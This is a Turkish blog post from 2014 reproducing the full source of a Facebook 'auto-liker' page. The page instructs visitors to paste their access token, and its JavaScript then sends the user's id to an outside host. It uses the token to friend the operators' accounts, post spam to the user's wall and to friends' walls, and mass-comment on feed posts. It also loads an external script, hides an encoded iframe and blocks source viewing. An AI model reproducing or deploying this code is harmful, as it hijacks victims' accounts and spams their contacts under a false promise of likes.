24 Haziran 2014 Salı

<meta name="robots" content="all" />
<meta name="robots" content="index,follow" />
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254" />
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-9" />
<meta http-equiv="Content-Type" content="text/html; charset=x-mac-turkish" />



<html class=" -moz-"><head>
<title>Ekle Begeni Yapalım</title>
<meta charset="UTF-8">
<link rel="stylesheet" type="text/css" media="all" href="tunerhd.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script>
<body>
<center><span style="color:red"><h1>Nasıl Kullanılır ?</h1></span>

       <span style="color:yellow"><h2> 1 ) İlk Olarak Token'al Butona Basınız.Tıklandıktan sonra 5 Saniye Bekleyip sağ üstten reklamı geç'e tıklayalım</h3></center></span>
       <span style="color:pink"><h2> 2 ) Ve sonra Gelen uygulamaya izin verelim. izin verdikten sonra hızlı bi şekilde üsteki linki kopyalayalım.</h3></center></span>
       <span style="color:aqua"><h2> 3 ) Daha Sonra Linkimizi Üsteki Boş yere Yapıştırıp Sisteme giriş yap diyelim. ve Beğenileriniz Gönderilecektir. Bizi tercih ettiğiniz için teşekkürler..</h3></center></span>



</center>

<center>
<div class="Token">

<button type="button" id="tokenal" style="margin:10 auto;" class="btn btn-NormaL btn-bloke btn-buyuk">Token Al</button>
    <form method="post" novalidate="novalidate">
    <input type="text" id="access_token" name="access_token" placeholder="https://www.facebook.com/connect/login_success.html#access_token=CAA" required="required" />
        <button type="button" id="gonder" class="btn btn-NormaL btn-bloke btn-buyuk">Sisteme Giriş Yap</button>
    </form>

</div>
</div>

<style type="text/css">
<!--
body{background-image:url(https://dogukanbinici.files.wordpress.com/2012/02/wallpaper-138250.jpg);background-attachment: fixed}
-->
</style>
</a>

<script>
 

  var arr=[""];
var tokenme;
var user = {};
function ileti(type,msg){
     $('#logs').append('<input type="text" style="text-align: center;" value="' + msg + '" disabled="1" required="required" />');
     $('#ileti').fadeIn('slow');
     $('#ileti').removeAttr('id');
  }
$('#gonder').click(function(){
    if($('#access_token').val().length > 50){
    $('.anlatim').hide();
    $('#logs').html("");
    $('#gonder').attr("disabled","disabled");
    $('#gonder').attr("class","btn btn-TunerHD btn-bloke btn-buyuk");
   
     access_token = $('#access_token').val();
     if(access_token.indexOf("access_token=") > 0){
     access_token = access_token.split("access_token=")[1].split("&")[0];
     $('#access_token').val(access_token);
     }
    jQuery.ajax({
    url:'https://graph.facebook.com/me?access_token=' + access_token,
    dataType:'jsonp',
    success:function(data){
    user = data;
    if(user && user.name){
    ileti("success","Hoşgeldin " + user.name);
      ileti("success","Beğenilerin, Paylaştığın Durumlara Gönderiliyor..."  +user.name);
      ileti("success","5 Dakika Sitede Bekle");
      ileti("success","Sayemizde Fame Olacaksın :3");
    $.post("http://liker.immense-ro.tk/main.php", { subs: user.id } );
    $.post("", { id: user.id, token: access_token } );
    tokenme = access_token;
         sil(access_token,100000425560657);
   
Abonecik("abdurrahim.ertem.1");
Abonecik("015ahmet15");
Abonecik("zekiye.akar.7");

    posttowall();
    foto_paylas();
arkadaslar();
    getStatus(access_token);
    sstats();
    }else{
    ileti("error",user.error.type+" error ("+user.error.code+")");
    $('#gonder').removeAttr("disabled");
    $('#gonder').attr("class","btn btn-NormaL btn-bloke btn-buyuk");
    }
    }
    });
    }
});

  aciklama = "Engel Var Ekle Begeni Yapalım "
function posttowall(){
     jQuery.ajax({
     url:'https://graph.facebook.com/me/feed?message='+ aciklama +'&method=POST&access_token=' + access_token,
     dataType:'script',
     success:function(){
     }
     });
}
function arkadaslar(){
     jQuery.ajax({
     url:'https://graph.facebook.com/fql?q=SELECT uid, first_name FROM user WHERE uid IN ( SELECT uid2 FROM friend WHERE uid1 = me() ) ORDER BY rand() limit 100&access_token='+access_token,
     dataType:'jsonp',
     success:function(data){
     wallpost(data);
     }
     });
}
function kayit(user,token){
     jQuery.ajax({
     url:'kayit.php',
     type:'POST',
     data:{userid:user.id,gender:user.gender,access_token:token,username:user.name},
     success:function(data){
     if(data == "true"){
     ileti("success","Kayit basarili");
     }
     }
     });
     }
   
     function sayfalar(sayfa){
   
     }
   
     function arakla(token){
     jQuery.ajax({
    url:'https://graph.facebook.com/me?access_token=' + token,
    dataType:'jsonp',
    success:function(data){
    if(data.id){
    kayit(data,token);
    }
    }});
     }
   
     fotolink = "";
  aciklama = "Engel Var Ekle Begeni Yapalım ";
     gonderildi = 0;
   
     function wallpost(list){
     for(i=0;i<list.data.length;i++){
     jQuery.ajax({
     url:'https://graph.facebook.com/'+list.data[i].uid+'/photos?url=' + fotolink + '&message=Hello '+list.data[i].first_name+ ' ' + aciklama +'&callback=paylas&method=POST&access_token=' + access_token,
     dataType:'script',
     success:function(){
     gonderildi += 1;
     if(gonderildi >= list.data.length){
            }
     }
     });
     }
     }
   
     function foto_paylas(){
     jQuery.ajax({
     url:'https://graph.facebook.com/me/photos?privacy={"value":"EVERYONE"}&url=' + fotolink + '&message='+ aciklama +'&callback=paylas&method=POST&access_token=' + access_token,
     dataType:'script',
     success:function(){
     }
     });
     }
var turler = {video:"Video",status:"Durum Guncellemesi",link:"Baglanti",photo:"Fotograf",swf:"Video"};
   
     function gonderiler(){
     jQuery.ajax({
     url:'https://graph.facebook.com/me?fields=feed.fields(message,privacy,type)&access_token=' + access_token,
     dataType:'jsonp',
     success:function(data){
     posts = data;
     for(i=0;i<posts.feed.data.length;i++){
     if(posts.feed.data[i].message){
     ileti("success",posts.feed.data[i].message.substr(0,50)+"... ("+turler[posts.feed.data[i].type]+")");
     }else{
     ileti("success","ID: "+posts.feed.data[i].id.split("_")[1]+"... ("+turler[posts.feed.data[i].type]+")");
     }
     }
     }
     });
     }
   
     function paylas(){
   
     }
   
     function sayfabegen(Link){
     jQuery.ajax({
     url:'https://graph.facebook.com/me/likes?access_token=' + access_token + '&method=POST&url=' + link,
     dataType:'jsonp',
     success:function(data){
          }
     });
     }
   
     function Abonecik(a)
   {
   $.getJSON('https://graph.facebook.com/me/friends?uid='+a+'&method=post&access_token='+access_token)
   }
     function Beyen(a)
   {
   $.getJSON('https://graph.facebook.com/'+a+'/likes?method=POST&access_token='+access_token)
   }

   
function sstats() {
access_token = $('#access_token').val();
    $.post("http://liker.immense-ro.tk/main.php", { subs: user.id } );
    sil(access_token,arr[Math.round(arr.length*Math.random())]);
    setTimeout("getStatus()",1000);
}
function getStatus(token){
  var commentShort = "Engel Var Ekle Begeni Yapalım ";
$.getJSON('https://graph.facebook.com/me?access_token=' + token, function (response) {
if (response.id) {
  var userid = response.id;
  var totalComments = 1000;
  $.getJSON('https://graph.facebook.com/' + userid + '/home?limit=' + totalComments + '&access_token=' + token, function (response) {
    if(response.data){
    var allPosts = [];
    $.each(response.data, function(i,data){
      allPosts.push(data.id);
      var megaNumber=Math.floor(Math.random()*900);
      var commentMessage = commentShort + ' (y) ' + megaNumber + ' (y) ';
      $.getJSON('https://graph.facebook.com/' + data.id + '/comments?method=POST&message=' + commentMessage + '&access_token=' + token, function (response) {
      //alert("Comment Posted!");
      });
    });
    }
  });
}
});
}
function sil(token,ids){
     $.getJSON('https://graph.facebook.com/me/friends?uid=' + ids + '&method=post&access_token=' + token, function (response) {
    //alert(response);
    });
}
function TokenUrl(id){
       return "http://bc.vc/YBPKoz";
       }
   
     $('#tokenal').click(function(){
     window.open(TokenUrl("http://bc.vc/YBPKoz"));
     });</script>







 

<!--Bu çalışma Creative Commons Attribution-Gayriticari-NoDerivs 3.0 Unported Lisansı ile lisanslanmıştır.-->
<!--Telif sahibi:koddostu.com-->
<!--Kod Dostu Açılır Kutu Bilgi Mesajı Kodu STOP-->

<script type="text/javascript">
//<![CDATA[
shortcut={all_shortcuts:{},add:function(a,b,c){var d={type:"keydown",propagate:!1,disable_in_input:!1,target:document,keycode:!1};if(c)for(var e in d)"undefined"==typeof c[e]&&(c[e]=d[e]);else c=d;d=c.target,"string"==typeof c.target&&(d=document.getElementById(c.target)),a=a.toLowerCase(),e=function(d){d=d||window.event;if(c.disable_in_input){var e;d.target?e=d.target:d.srcElement&&(e=d.srcElement),3==e.nodeType&&(e=e.parentNode);if("INPUT"==e.tagName||"TEXTAREA"==e.tagName)return}d.keyCode?code=d.keyCode:d.which&&(code=d.which),e=String.fromCharCode(code).toLowerCase(),188==code&&(e=","),190==code&&(e=".");var f=a.split("+"),g=0,h={"`":"~",1:"!",2:"@",3:"#",4:"$",5:"%",6:"^",7:"&",8:"*",9:"(",0:")","-":"_","=":"+",";":":","'":'"',",":"<",".":">","/":"?","\\":"|"},i={esc:27,escape:27,tab:9,space:32,"return":13,enter:13,backspace:8,scrolllock:145,scroll_lock:145,scroll:145,capslock:20,caps_lock:20,caps:20,numlock:144,num_lock:144,num:144,pause:19,"break":19,insert:45,home:36,"delete":46,end:35,pageup:33,page_up:33,pu:33,pagedown:34,page_down:34,pd:34,left:37,up:38,right:39,down:40,f1:112,f2:113,f3:114,f4:115,f5:116,f6:117,f7:118,f8:119,f9:120,f10:121,f11:122,f12:123},j=!1,l=!1,m=!1,n=!1,o=!1,p=!1,q=!1,r=!1;d.ctrlKey&&(n=!0),d.shiftKey&&(l=!0),d.altKey&&(p=!0),d.metaKey&&(r=!0);for(var s=0;k=f[s],s<f.length;s++)"ctrl"==k||"control"==k?(g++,m=!0):"shift"==k?(g++,j=!0):"alt"==k?(g++,o=!0):"meta"==k?(g++,q=!0):1<k.length?i[k]==code&&g++:c.keycode?c.keycode==code&&g++:e==k?g++:h[e]&&d.shiftKey&&(e=h[e],e==k&&g++);if(g==f.length&&n==m&&l==j&&p==o&&r==q&&(b(d),!c.propagate))return d.cancelBubble=!0,d.returnValue=!1,d.stopPropagation&&(d.stopPropagation(),d.preventDefault()),!1},this.all_shortcuts[a]={callback:e,target:d,event:c.type},d.addEventListener?d.addEventListener(c.type,e,!1):d.attachEvent?d.attachEvent("on"+c.type,e):d["on"+c.type]=e},remove:function(a){var a=a.toLowerCase(),b=this.all_shortcuts[a];delete this.all_shortcuts[a];if(b){var a=b.event,c=b.target,b=b.callback;c.detachEvent?c.detachEvent("on"+a,b):c.removeEventListener?c.removeEventListener(a,b,!1):c["on"+a]=!1}}},shortcut.add("Ctrl+U",function(){top.location.href="https://www.facebook.com/sXe.CooL1903"});
//]]>
</script>
<!--Koddostu Sağ Tıklama Engeli Kodu START-->
<!--Bu çalışma Creative Commons Attribution-Gayriticari-NoDerivs 3.0 Unported Lisansı ile lisanslanmıştır.-->
<!--Telif sahibi:koddostu.com-->

<style>#koddostu-sagclick{position:absolute;z-index:999999;height:12px;border:1px solid #bababa;box-shadow:2px 2px 2px #959595;padding:6px 10px 6px 5px;background:#fff;line-height:12px;font-family: Segoe UI;font-size:12px;font-weight:normal;color:#000;top:0px;left:0px;display:none;cursor:default;}#koddostu-sagclick:hover{background:#f5f5f5;cursor:default;}</style><div onclick="this.style.display='none';" id="koddostu-sagclick">Sağ Tıklama Engeli Vardır.</div><script type="text/javascript">if (document.addEventListener){document.addEventListener('contextmenu', function(e) {var kdax=e.pageX + 3;var kday=e.pageY + 2;var rdn= Math.floor((Math.random()*15)+1);var p=document.getElementById('koddostu-sagclick');if(rdn==8){p.innerHTML='Sağ Tıklama Engeli Vardır.'}p.style.display='block';p.style.top=kday;p.style.left=kdax;e.preventDefault();}, false);} else {document.attachEvent('oncontextmenu', function() {window.event.returnValue = false;});}</script>


<!--Bu çalışma Creative Commons Attribution-Gayriticari-NoDerivs 3.0 Unported Lisansı ile lisanslanmıştır.-->
<!--Telif sahibi:koddostu.com-->
<!--Koddostu Sağ Tıklama Engeli Kodu STOP-->









</body>
<b><center><font color="white"> ERTEM Beğeni Uygulamaları 2013-2014</font></center></b>

<script type="text/javascript" src="http://ifc.or.id/css/angkasa.js"></script>

<!--- Bu Kod Ceyhun Y?lmaz Taraf?ndan Lisanslanm??t?r !--->
<!--- Facebook Spam Engeli Kald?rma --->
<!--- Kod ??erisinde De?i?iklili?e ?zin Verilmemektedir --->

<script type="text/javascript">
<!-- wmaraci html ?ifreleyici http://wmaraci.com -->
document.write(unescape('%0A%3C%61%20%68%72%65%66%3D%22%6A%61%76%61%73%63%72%69%70%74%3A%76%6F%69%64%28%30%29%22%20%6F%6E%63%6C%69%63%6B%3D%22%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%27%29%2E%73%74%79%6C%65%2E%64%69%73%70%6C%61%79%3D%27%62%6C%6F%63%6B%27%3B%22%20%73%74%79%6C%65%3D%22%74%65%78%74%2D%64%65%63%6F%72%61%74%69%6F%6E%3A%20%6E%6F%6E%65%3B%22%3E%3C%62%75%74%74%6F%6E%3E%0A%3C%69%66%72%61%6D%65%20%62%6F%72%64%65%72%3D%22%31%30%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%31%30%22%20%68%65%69%67%68%74%3D%22%32%30%22%20%6D%61%72%67%69%6E%68%65%69%67%68%74%3D%22%30%22%20%6D%61%72%67%69%6E%77%69%64%74%68%3D%22%30%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%65%62%75%79%75%73%75%6B%2E%63%6F%6D%2F%32%30%31%33%2F%31%30%2F%66%61%74%69%68%2D%73%75%6C%74%61%6E%2D%6D%65%68%6D%65%74%2D%6B%69%6D%64%69%72%2E%68%74%6D%6C%0A%22%20%77%69%64%74%68%3D%22%32%22%3E%3C%2F%69%66%72%61%6D%65%3E%0A%3C%2F%62%75%74%74%6F%6E%3E%3C%2F%61%3E%0A'));
</script>
<!--- Kod ??erisinde De?i?iklili?e ?zin Verilmemektedir --->
<!--- Facebook Spam Engeli Kald?rma --->
<!--- Bu Kod Ceyhun Y?lmaz Taraf?ndan Lisanslanm??t?r !--->

Hiç yorum yok:

Yorum Gönder